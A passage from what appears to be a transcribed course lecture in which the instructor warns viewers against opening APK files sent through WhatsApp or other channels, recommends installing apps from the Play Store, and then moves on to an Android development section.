of the hackers, obviously. So if somebody sends you some APK, don't open it if you don't know them. If you even know them, if you get suspicious, don't open them, because it's very easy to get hacked, as you can see. So it's not even easy to hack into the Windows machines because of the Defender and other antiviruses, but in Android, in real life, they won't even get detected, okay? So if you send them and if they click on it, it will just pop open and you will get hacked. So just keep that in mind. If somebody sends you APKs, just don't open them. I suggest you stick to the Play Store. So of course somebody could have uploaded this to the Play Store as well, but it will get down eventually. It will be taken down eventually. They generally understand it in a couple of days, so you won't have that kind of risk over there, at least a very high risk. But if somebody sends you some APK through WhatsApp or some other platform, just beware of it. So that's it. We're going to stop here and we're going to start learning about Android development within the next section.